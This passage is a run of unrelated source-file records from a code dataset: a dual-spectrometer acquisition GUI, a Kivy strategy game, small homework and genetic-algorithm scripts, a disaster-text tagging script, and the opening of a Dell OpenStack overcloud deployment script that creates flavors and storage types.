in\n self.results_folder = self.ent_fp.get()\n \n # Create the directory \n self.results_folder = make_directory(self.results_folder)\n \n self.ent_fp.delete(0, len(self.ent_fp.get()))\n self.ent_fp.insert(0,str(self.results_folder))\n \n # Create notes file\n with open(self.ent_fp.get() + 'notes.txt', 'w') as w:\n w.write('Notes file for dual_spectro_run.py output\\n\\n')\n \n#========================================================================================\n#=====================================Read spectro once==================================\n#========================================================================================\n\n # Read spectrometer once and display \n def read_single(self):\n \n # Create results queue\n result_queue = Queue()\n \n # Create threads\n t0 = Thread(target=read_spectro, args = (result_queue, \n self.spec0, \n int(self.ent_intime0.get()),\n int(self.ent_coadds0.get()),\n 2048,\n True,\n True))\n \n t1 = Thread(target=read_spectro, args = (result_queue, \n self.spec1, \n int(self.ent_intime1.get()),\n int(self.ent_coadds1.get()),\n 2048,\n True,\n True))\n \n # Begin threads\n t0.start()\n t1.start()\n \n # End threads\n t0.join()\n t1.join()\n \n # Unpack results\n thread_out = {}\n \n while not result_queue.empty():\n result = result_queue.get()\n thread_out[result[0]] = result[1]\n \n x0, y0, head0 = thread_out[str(self.spec0)]\n x1, y1, head1 = thread_out[str(self.spec1)]\n \n # Plot spectra\n self.line0.set_data(x0, y0)\n 
self.ax0.set_xlim(x0.min(), x0.max())\n self.ax0.set_ylim(y0.min(), y0.max())\n self.line1.set_data(x1, y1)\n self.ax1.set_xlim(x1.min(), x1.max())\n self.ax1.set_ylim(y1.min(), y1.max())\n self.canvas.draw()\n\n#========================================================================================\n#======================================Read dark spectra=================================\n#========================================================================================\n \n # Read the dark spectra \n def read_dk(self):\n \n # Update notes file\n self.write_text('Begin reading dark')\n print('Begin reading dark')\n \n # Create zero array to hold dark spectra\n self.dark0 = np.zeros(2048)\n self.dark1 = np.zeros(2048)\n \n # Define dark filepath\n dark_fp0 = self.ent_fp.get() + self.spec_name0 + '/dark/'\n dark_fp1 = self.ent_fp.get() + self.spec_name1 + '/dark/'\n \n # Create the directory \n dark_fp0 = make_directory(dark_fp0)\n dark_fp1 = make_directory(dark_fp1)\n \n # Loop over number of darks to collect\n for i in range(int(self.ent_dark0.get())):\n \n # Create filename\n n = str('{num:05d}'.format(num=i))\n fname0 = dark_fp0 + 'spectrum_' + n + '.txt'\n fname1 = dark_fp1 + 'spectrum_' + n + '.txt'\n \n # Create results queue\n result_queue = Queue()\n \n # Create threads\n t0 = Thread(target=read_spectro, args = (result_queue, \n self.spec0, \n int(self.ent_intime0.get()),\n int(self.ent_coadds0.get()),\n 2048,\n True,\n True))\n \n t1 = Thread(target=read_spectro, args = (result_queue, \n self.spec1, \n int(self.ent_intime1.get()),\n int(self.ent_coadds1.get()),\n 2048,\n True,\n True))\n \n # Begin threads\n t0.start()\n t1.start()\n \n # End threads\n t0.join()\n t1.join()\n \n # Unpack results\n thread_out = {}\n \n while not result_queue.empty():\n result = result_queue.get()\n thread_out[result[0]] = result[1]\n \n x0, y0, head0 = thread_out[str(self.spec0)]\n x1, y1, head1 = thread_out[str(self.spec1)]\n \n # Save the spectra\n np.savetxt(fname0, np.column_stack((x0,y0)), header = head0)\n np.savetxt(fname1, np.column_stack((x1,y1)), header = head1)\n \n # Sum up the darks\n self.dark0 = np.add(self.dark0, y0)\n self.dark1 = np.add(self.dark1, y1)\n \n # Divide by number of darks to get average\n self.dark0 = self.dark0 / int(self.ent_dark0.get())\n self.dark1 = self.dark1 / int(self.ent_dark1.get())\n \n # Display the dark spectra\n self.line0.set_data(x0, y0)\n self.ax0.set_xlim(x0.min() - 5, x0.max() + 5)\n self.ax0.set_ylim(y0.min(), y0.max())\n self.line1.set_data(x1, y1)\n self.ax1.set_xlim(x1.min() - 5, x1.max() + 5)\n self.ax1.set_ylim(y1.min(), y1.max())\n self.canvas.draw()\n \n # Update notes file\n self.write_text('Dark updated\\n' + \\\n 'Spectrum no: ' + str(self.loop) + '\\n' + \\\n 'Time: ' + str(datetime.datetime.now()) + '\\n' + \\\n 'No. 
darks: ' + str(self.ent_dark0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name0 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime0.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name1 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime1.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds1.get()))\n\n#========================================================================================\n#=======================================Start and stop===================================\n#========================================================================================\n \n # Start acquiring spectra \n def start_stop(self):\n \n # Begin acquisition\n if self.start_button.config('text')[-1] == 'START':\n # Start the acquire loop\n self.running = True\n \n # Update the button\n self.start_button.config(text = 'STOP')\n self.start_button.config(bg = 'red')\n \n # Update notes file\n self.write_text('Loop started\\n' + \\\n 'Spectrum no: ' + str(self.loop) + '\\n' + \\\n 'Time: ' + str(datetime.datetime.now()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name0 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime0.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name1 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime1.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds1.get()))\n \n # Stop acquisition\n else:\n # Stop the acquire loop\n self.running = False\n \n # Update button\n self.start_button.config(text = 'START')\n self.start_button.config(bg = 'green')\n \n # Update notes file\n self.write_text('Loop stopped\\n' + \\\n 'Spectrum no: ' + str(self.loop) + '\\n' + \\\n 'Time: ' + str(datetime.datetime.now()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name0 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime0.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name1 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime1.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds1.get()))\n \n#========================================================================================\n#======================================Acquire spectra===================================\n#========================================================================================\n \n # Loop continuously, acquire spectra when running = True \n def acquire(self):\n \n # Define spectra filepaths\n spectra_fp0 = self.ent_fp.get() + self.spec_name0 + '/spectra/'\n spectra_fp1 = self.ent_fp.get() + self.spec_name1 + '/spectra/'\n \n # Create if it does not exist\n if not os.path.exists(spectra_fp0):\n os.makedirs(spectra_fp0)\n if not os.path.exists(spectra_fp1):\n os.makedirs(spectra_fp1)\n \n if self.running:\n \n n = str('{num:05d}'.format(num=self.loop)) \n \n # Create filenames\n fname0 = spectra_fp0 + 'spectrum_' + n + '.txt'\n fname1 = spectra_fp1 + 'spectrum_' + n + '.txt'\n \n # Read spectrometers\n \n # Create results queue\n result_queue = Queue()\n \n # Create threads\n t0 = Thread(target=read_spectro, args = (result_queue, \n self.spec0, \n int(self.ent_intime0.get()),\n int(self.ent_coadds0.get()),\n 2048,\n True,\n True))\n \n t1 = Thread(target=read_spectro, args = (result_queue, \n self.spec1, \n int(self.ent_intime1.get()),\n int(self.ent_coadds1.get()),\n 2048,\n True,\n True))\n \n # Begin threads\n t0.start()\n t1.start()\n \n # End threads\n t0.join()\n t1.join()\n 
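# Both worker threads are done; the queue now holds one (spectrometer key, (x, y, header)) result per device.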
\n # Unpack results\n thread_out = {}\n \n while not result_queue.empty():\n result = result_queue.get()\n thread_out[result[0]] = result[1]\n \n x0, y0, head0 = thread_out[str(self.spec0)]\n x1, y1, head1 = thread_out[str(self.spec1)]\n \n # Save the spectra\n np.savetxt(fname0, np.column_stack((x0,y0)), header = head0)\n np.savetxt(fname1, np.column_stack((x1,y1)), header = head1)\n \n # Plot the spectra\n \n # Bounds\n y0_low = min(y0) - (0.1*min(y0))\n y0_high = max(y0) + (0.1*max(y0))\n y1_low = min(y1) - (0.1*min(y1))\n y1_high = max(y1) + (0.1*max(y1))\n \n # Replot\n self.line0.set_data(x0, y0)\n self.ax0.set_xlim(x0.min() - 5, x0.max() + 5)\n self.ax0.set_ylim(y0_low, y0_high)\n self.line1.set_data(x1, y1)\n self.ax1.set_xlim(x1.min() - 5, x1.max() + 5)\n self.ax1.set_ylim(y1_low, y1_high)\n self.canvas.draw()\n \n # Add one to loop\n self.loop += 1\n \n # Loop every 1 ms in background to check if commenced\n self.after(1, self.acquire)\n \n# Tkinter stuff \napp = mygui()\napp.geometry(\"1280x720\")\napp.mainloop()","sub_path":"dual_spectro_run.py","file_name":"dual_spectro_run.py","file_ext":"py","file_size_in_byte":27736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"354288203","text":"from kivy.app import App\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, DictProperty, StringProperty\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\nfrom kivy.event import EventDispatcher\n\nfrom kivy.clock import Clock\n\nFPS = 1\n\n# resources\nRESOURCES = {\n \"food\": {\n \"n\": 500,\n \"per_s\": 0\n },\n \"wood\": {\n \"n\": 0,\n \"per_s\": 0\n },\n \"stone\": {\n \"n\": 0,\n \"per_s\": 0\n },\n \"metal\": {\n \"n\": 0,\n \"per_s\": 0\n }\n}\n\n# Buildings\nBUILDINGS = {\n \"farm\": {\n \"name\": \"Farm\",\n \"resources_per_s\": {\"food\": 10},\n \"n\": 0,\n },\n \"forest_camp\": {\n \"name\": \"Forest Camp\",\n \"resources_per_s\": {\"food\": 2, \"wood\": 5},\n \"n\": 0,\n },\n \"quarry\": {\n \"name\": \"Quarry\",\n \"resources_per_s\": {\"stone\": 2},\n \"n\": 0,\n },\n \"mine\": {\n \"name\": \"Mine\",\n \"resources_per_s\": {\"metal\": 1},\n \"n\": 0,\n }\n}\n\n# units\nUNITS = {\n \"villager\": {\n \"name\": \"Villager\",\n \"shortname\": \"v\",\n \"n\": 0,\n \"cost\": {\n \"food\": 50,\n },\n \"attack\": 1,\n \"life\": 15,\n },\n \"spearman\": {\n \"name\": \"Spearman\",\n \"shortname\": \"sp\",\n \"n\": 0,\n \"cost\": {\n \"food\": 80,\n \"wood\": 10,\n \"metal\": 8,\n },\n \"attack\": 7,\n \"life\": 30,\n },\n \"axeman\": {\n \"name\": \"Axeman\",\n \"n\": 0,\n \"cost\": {\n \"food\": 100,\n \"metal\": 15,\n },\n \"attack\": 10,\n \"life\": 25,\n },\n \"swordman\": {\n \"name\": \"Swordman\",\n \"n\": 0,\n \"cost\": {\n \"food\": 100,\n \"wood\": 5,\n \"metal\": 25,\n },\n \"attack\": 12,\n \"life\": 50,\n },\n \"cavalry\": {\n \"name\": \"Cavalry\",\n \"n\": 0,\n \"cost\": {\n \"food\": 300,\n \"wood\": 15,\n \"metal\": 25,\n },\n \"attack\": 15,\n \"life\": 80\n }\n}\n\n\nclass Farm(EventDispatcher):\n id = \"farm\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Farm\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = 
BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass ForestCamp(EventDispatcher):\n id = \"forest_camp\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Forest Camp\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass Quarry(EventDispatcher):\n id = \"quarry\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Quarry\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass Mine(EventDispatcher):\n id = \"mine\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Mine\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass Buildings(GridLayout):\n farm = ObjectProperty(Farm())\n forest_camp = ObjectProperty(ForestCamp())\n quarry = ObjectProperty(Quarry())\n mine = ObjectProperty(Mine())\n\n def calc_total_villager_working(self):\n self.total = 0\n for building_name in BUILDINGS:\n building = getattr(self, building_name)\n self.total += building.n\n return self.total\n\n\nclass Food(EventDispatcher):\n id = \"food\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Wood(EventDispatcher):\n id = \"wood\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Stone(EventDispatcher):\n id = \"stone\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Metal(EventDispatcher):\n id = \"metal\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Resources(GridLayout):\n food = ObjectProperty(Food())\n wood = ObjectProperty(Wood())\n stone = ObjectProperty(Stone())\n metal = ObjectProperty(Metal())\n\n def update(self, dt):\n # print(\"update resources\")\n self.food.n += dt * self.food.per_s\n self.wood.n += dt * self.wood.per_s\n self.stone.n += dt * self.stone.per_s\n self.metal.n += dt * self.metal.per_s\n # print(self.food)\n\n\nclass Villager(EventDispatcher):\n id = \"villager\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = 
DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Spearman(EventDispatcher):\n id = \"spearman\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Axeman(EventDispatcher):\n id = \"axeman\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Swordman(EventDispatcher):\n id = \"swordman\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Cavalry(EventDispatcher):\n id = \"cavalry\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Units(GridLayout):\n villager = ObjectProperty(Villager())\n spearman = ObjectProperty(Spearman())\n axeman = ObjectProperty(Axeman())\n swordman = ObjectProperty(Swordman())\n cavalry = ObjectProperty(Cavalry())\n\n\nclass RecruitMenu(GridLayout):\n pass\n\n\nclass Game(GridLayout):\n resources = ObjectProperty(Resources())\n units = ObjectProperty(Units())\n buildings = ObjectProperty(Buildings())\n\n def update(self, dt):\n # print(\"update game\")\n self.resources.update(dt)\n \n def recruit(self, unit, n):\n n = int(n)\n if self.resources.food.n >= unit.cost.get(\"food\", 0) * n and\\\n self.resources.wood.n >= unit.cost.get(\"wood\", 0) * n and\\\n self.resources.stone.n >= unit.cost.get(\"stone\", 0) * n and\\\n self.resources.metal.n >= unit.cost.get(\"metal\", 0) * n:\n self.resources.food.n -= unit.cost.get(\"food\", 0) * n\n self.resources.wood.n -= unit.cost.get(\"wood\", 0) * n\n self.resources.stone.n -= unit.cost.get(\"stone\", 0) * n\n self.resources.metal.n -= unit.cost.get(\"metal\", 0) * n\n unit.n += n\n \n def calc_idle_villagers(self):\n return self.units.villager.n - self.buildings.calc_total_villager_working()\n \n def update_resources_per_s(self):\n self.resources.food.per_s = 0\n self.resources.wood.per_s = 0\n self.resources.stone.per_s = 0\n self.resources.metal.per_s = 0\n for resource_name in RESOURCES:\n resource = getattr(self.resources, resource_name)\n for building_name in BUILDINGS:\n building = getattr(self.buildings, building_name)\n resource.per_s += building.resources_per_s[resource_name]\n\n\n def change_people_working_in_a_building(self, building, n):\n n = int(n)\n idle = self.calc_idle_villagers()\n # difference in workers between now and future:\n diff = n - building.n\n\n if idle >= diff:\n building.n = n\n for resource_name in RESOURCES:\n building.resources_per_s[resource_name] = building.resources_per_s_per_unit.get(resource_name, 0) * n\n self.update_resources_per_s()\n\nclass RPGApp(App):\n game = ObjectProperty(Game())\n\n def build(self):\n game = Game()\n Clock.schedule_interval(game.update, 1.0/FPS)\n return game\n\nif __name__ == \"__main__\":\n RPGApp().run()","sub_path":"python/kivy/RPG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"153372114","text":"\"\"\"\nSome of the functions have a bit cumbersome behavior when we deal with\npositional and keyword arguments.\n\nWrite a function that accept any iterable of unique values and then\nit behaves as range function:\n\n\nimport string\n\n\nassert = custom_range(string.ascii_lowercase, 'g') 
== ['a', 'b', 'c', 'd', 'e', 'f']\nassert custom_range(string.ascii_lowercase, 'g', 'p') == ['g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o']\nassert custom_range(string.ascii_lowercase, 'p', 'g', -2) == ['p', 'n', 'l', 'j', 'h']\n\n\nThis function accepts only values that have distinct hashes or ids.\n\"\"\"\n\n\ndef custom_range(ranged, start, stop=None, step=1):\n if len(ranged) == 0:\n raise ValueError(\"Input has no elements\")\n if len(set(ranged)) != len(ranged):\n raise ValueError(\"Input contains non-unique values\")\n if stop is None:\n stop = start\n start = ranged[0]\n return list(ranged[ranged.index(start):ranged.index(stop):step])\n","sub_path":"homework_02/custom_range.py","file_name":"custom_range.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"588637351","text":"import random\nimport string\nfrom difflib import SequenceMatcher\n\n\n\nclass Individu:\n\n def __init__(self, finalWord, defaultValue=None):\n super().__init__()\n if defaultValue is not None:\n self.word = defaultValue\n else:\n self.word = self.__generateWord(len(finalWord))\n self.genFitness(finalWord)\n\n \n def __generateWord(self, length):\n # letters = string.ascii_lowercase + ' '\n letters = string.printable\n return ''.join(random.choice(letters) for i in range(length))\n\n def genFitness(self, finalWord):\n self.fitness = SequenceMatcher(None, self.word, finalWord).ratio()\n # arrDiff = [i for i in range(len(self.word)) if self.word[i] != finalWord[i]]\n # self.fitness = 1 - (len(arrDiff) / len(finalWord))\n return self.fitness\n\n def randomMutate(self, percentage):\n isMutate = random.random()\n if isMutate < percentage:\n # randrange keeps pos strictly inside the word\n pos = random.randrange(len(self.word))\n letters = string.ascii_lowercase + ' '\n self.word = self.word[:pos] + random.choice(letters) + self.word[pos + 1 :]\n return\n","sub_path":"build/lib/TP-genetique/Individu.py","file_name":"Individu.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"97319262","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\n\n\ndef normalize_words():\n arq = open('disasters_words.txt').readlines()\n text = \" \".join(arq).replace(',', ' ').lower().split(' ')\n return sorted(set([x for x in text if len(x) > 1]))\n\n\ndef normalize_text(words):\n\n data = pd.read_csv('DATASET.csv')\n data['class'] = 0\n\n for index in data.index:\n text = data['text'][index]\n result = pd.Index(str(text).split()).intersection(pd.Index(words))\n\n if len(result) != 0:\n data.loc[index, 'class'] = 1\n return data\n\n\nif __name__ == \"__main__\":\n\n data = normalize_text(normalize_words())\n data.to_csv(\"DATASET_interests.csv\", index=False)\n","sub_path":"Preprocess - NLP/related_content.py","file_name":"related_content.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"631764814","text":"#!/usr/bin/python3\n\n# Copyright (c) 2016-2021 Dell Inc. 
or its subsidiaries.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport os\nimport re\nimport sys\nimport subprocess\nimport logging\nimport novaclient.client as nova_client\nimport time\nfrom ironic_helper import IronicHelper\nfrom logging_helper import LoggingHelper\nfrom credential_helper import CredentialHelper\nfrom dell_nfv import ConfigOvercloud\n# Dell utilities\nfrom identify_nodes import main as identify_nodes\nfrom update_ssh_config import main as update_ssh_config\nlogging.basicConfig()\nlogger = logging.getLogger(os.path.splitext(os.path.basename(sys.argv[0]))[0])\n\nhome_dir = os.path.expanduser('~')\n\nBAREMETAL_FLAVOR = \"baremetal\"\n\n\n# Check to see if the sequence contains numbers that increase by 1\ndef is_coherent(seq):\n r = []\n for i in range(seq[0], seq[-1]+1):\n r.append(i)\n return seq == r\n\n\ndef validate_node_placement():\n logger.info(\"Validating node placement...\")\n\n # For each role/flavor, node indices must start at 0 and increase by 1\n ironic = IronicHelper.get_ironic_client()\n\n flavor_to_indices = {}\n for node in ironic.node.list(detail=True):\n # Skip nodes that are in maintenance mode\n if node.maintenance:\n continue\n\n # Get the value of the \"node\" capability\n node_capability = None\n capabilities = node.properties[\"capabilities\"]\n for capability in capabilities.split(\",\"):\n (key, val) = capability.split(\":\")\n if key == \"node\":\n node_capability = val\n\n # If the node capability was not set then error out\n if not node_capability:\n ip, _ = CredentialHelper.get_drac_ip_and_user(node)\n\n raise ValueError(\"Error: Node {} has not been assigned a node \"\n \"placement index. Run assign_role for this \"\n \"node and specify a role with the \"\n \"- format\".format(ip))\n\n hyphen = node_capability.rfind(\"-\")\n flavor = node_capability[0:hyphen]\n index = node_capability[hyphen + 1:]\n # Build up a dict that maps a flavor name to a sequence of placment\n # indices\n if flavor not in flavor_to_indices:\n flavor_to_indices[flavor] = []\n\n flavor_to_indices[flavor].append(int(index))\n\n # Validate that the sequence starts at zero and is coherent\n error_msg = ''\n for flavor in flavor_to_indices.keys():\n flavor_to_indices[flavor].sort()\n seq = flavor_to_indices[flavor]\n if seq[0] != 0:\n error_msg += \"Error: There must be a node with flavor \\\"{}\\\" \" \\\n \"that has node placement index 0. Current nodes placement \" \\\n \"indices are {}\\n\".format(flavor, str(seq))\n\n if not is_coherent(seq):\n error_msg += \"Error: Nodes that have been assigned the \\\"{}\\\" \" \\\n \"flavor do not have node placement indices that increase by \" \\\n \"1. 
Current node indices are {}\\n\".format(flavor, str(seq))\n\n # If any errors were detected then bail\n if error_msg:\n raise ValueError(error_msg)\n\n\ndef create_flavors():\n logger.info(\"Creating overcloud flavors...\")\n\n flavors = [\n {\"id\": \"1\", \"name\": \"m1.tiny\", \"memory\": 512, \"disk\": 1,\n \"cpus\": 1},\n {\"id\": \"2\", \"name\": \"m1.small\", \"memory\": 2048, \"disk\": 20,\n \"cpus\": 1},\n {\"id\": \"3\", \"name\": \"m1.medium\", \"memory\": 4096, \"disk\": 40,\n \"cpus\": 2},\n {\"id\": \"4\", \"name\": \"m1.large\", \"memory\": 8192, \"disk\": 80,\n \"cpus\": 4},\n {\"id\": \"5\", \"name\": \"m1.xlarge\", \"memory\": 16384, \"disk\": 160,\n \"cpus\": 8}]\n\n os_auth_url, os_tenant_name, os_username, os_password, \\\n os_user_domain_name, os_project_domain_name = \\\n CredentialHelper.get_overcloud_creds()\n\n kwargs = {'username': os_username,\n 'password': os_password,\n 'auth_url': os_auth_url,\n 'project_name': os_tenant_name,\n 'user_domain_name': os_user_domain_name,\n 'project_domain_name': os_project_domain_name}\n n_client = nova_client.Client(2, **kwargs)\n\n existing_flavor_ids = []\n for existing_flavor in n_client.flavors.list(detailed=False):\n existing_flavor_ids.append(existing_flavor.id)\n\n for flavor in flavors:\n if flavor[\"id\"] not in existing_flavor_ids:\n print(' Creating ' + flavor[\"name\"])\n n_client.flavors.create(flavor[\"name\"], flavor[\"memory\"],\n flavor[\"cpus\"], flavor[\"disk\"],\n flavorid=flavor[\"id\"])\n else:\n print(' Flavor ' + flavor[\"name\"] + \" already exists\")\n\n\ndef create_volume_types():\n logger.info(\"Creating cinder volume types...\")\n types = []\n if not args.disable_rbd:\n types.append([\"rbd_backend\", \"tripleo_ceph\"])\n\n if args.enable_dellsc:\n types.append([\"dellsc_backend\", \"tripleo_dellsc\"])\n\n if args.enable_unity:\n types.append([\"unity_backend\", \"tripleo_dellemc_unity\"])\n\n if args.enable_powermax:\n types.append([\"powermax_backend\", \"tripleo_dellemc_powermax\"])\n\n if args.num_powerflex > 0:\n types.append([\"powerflex_backend\", \"tripleo_dellemc_powerflex\"])\n\n overcloudrc_name = CredentialHelper.get_overcloudrc_name()\n\n for type in types:\n type_name = type[0]\n cmd = \"source {} && cinder type-list | grep ' {} ' | \" \\\n \"awk '{{print $4}}'\".format(overcloudrc_name, type_name)\n proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)\n return_output = proc.communicate()[0].strip()\n\n if type_name == return_output:\n logger.warning(\"Cinder type exists, skipping {}\".format(type[0]))\n continue\n else:\n logger.info(\"Creating cinder type {}\".format(type[0]))\n cmd = \"source {} && \" \\\n \"cinder type-create {} && \" \\\n \"cinder type-key {} set volume_backend_name={}\" \\\n \"\".format(overcloudrc_name, type[0], type[0], type[1])\n os.system(cmd)\n\n os.system(\"source {} && \"\n \"cinder extra-specs-list\".format(overcloudrc_name))\n\n\ndef create_share_types():\n logger.info(\"Creating manila share types...\")\n types = []\n\n if args.enable_unity_manila:\n types.append([\"unity_share\", \"tripleo_manila_unity\"])\n\n if args.enable_powermax_manila:\n types.append([\"powermax_share\", \"tripleo_manila_powermax\"])\n\n overcloudrc_name = CredentialHelper.get_overcloudrc_name()\n\n for type in types:\n type_name = type[0]\n cmd = \"source {} && manila type-list | grep ' {} ' | \" \\\n \"awk '{{print $4}}'\".format(overcloudrc_name, type_name)\n proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)\n return_output = 
proc.communicate()[0].strip()\n\n if type_name == return_output:\n logger.warning(\"Manila type exists, skipping {}\".format(type[0]))\n continue\n else:\n logger.info(\"Creating manila share type {}\".format(type[0]))\n cmd = \"source {} && \" \\\n \"manila type-create --is_public True {} true && \" \\\n \"manila type-key {} set share_backend_name={}\" \\\n \"\".format(overcloudrc_name, type[0], type[0], type[1])\n os.system(cmd)\n\n os.system(\"source {} && \"\n \"manila extra-specs-list\".format(overcloudrc_name))\n\n\ndef run_deploy_command(cmd):\n status = os.system(cmd)\n\n if status == 0:\n stack_status = CredentialHelper.get_overcloud_stack_status()\n if not stack_status or 'FAILED' in stack_status:\n logger.info(\"\\nDeployment failed even \"\n \"though command returned success.\")\n status = 1\n\n return status\n\n\ndef finalize_overcloud():\n # from keystone.v3 import client\n\n # os_auth_url, os_tenant_name, os_username, os_password = \\\n # CredentialHelper.get_overcloud_creds()\n\n # try:\n # keystone_client = client.get_keystone_client(os_username,\n # os_password,\n # os_tenant_name,\n # os_auth_url)\n # except:\n # return None\n\n create_flavors()\n create_volume_types()\n create_share_types()\n\n # horizon_service = keystone_client.services.find(**{'name': 'horizon'})\n # horizon_endpoint = keystone_client.endpoints.find(\n # **{'service_id': horizon_service.id})\n # return horizon_endpoint.publicurl\n return None\n\n\ndef main():\n try:\n global args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--controllers\",\n dest=\"num_controllers\",\n type=int,\n default=3,\n help=\"The number of controller nodes\")\n parser.add_argument(\"--dell-computes\",\n dest=\"num_dell_computes\",\n type=int,\n required=True,\n help=\"The number of dell compute nodes\")\n parser.add_argument(\"--dell-computeshci\",\n dest=\"num_dell_computeshci\",\n type=int,\n required=True,\n help=\"The number of dell hci compute nodes\")\n parser.add_argument(\"--storage\",\n dest=\"num_storage\",\n type=int,\n required=True,\n help=\"The number of storage nodes\")\n parser.add_argument(\"--powerflex\",\n dest=\"num_powerflex\",\n type=int,\n required=True,\n help=\"The number of powerflex storage nodes\")\n parser.add_argument(\"--enable_hugepages\",\n action='store_true',\n default=False,\n help=\"Enable/Disable hugepages feature\")\n parser.add_argument(\"--enable_numa\",\n action='store_true',\n default=False,\n help=\"Enable/Disable numa feature\")\n parser.add_argument(\"--vlans\",\n 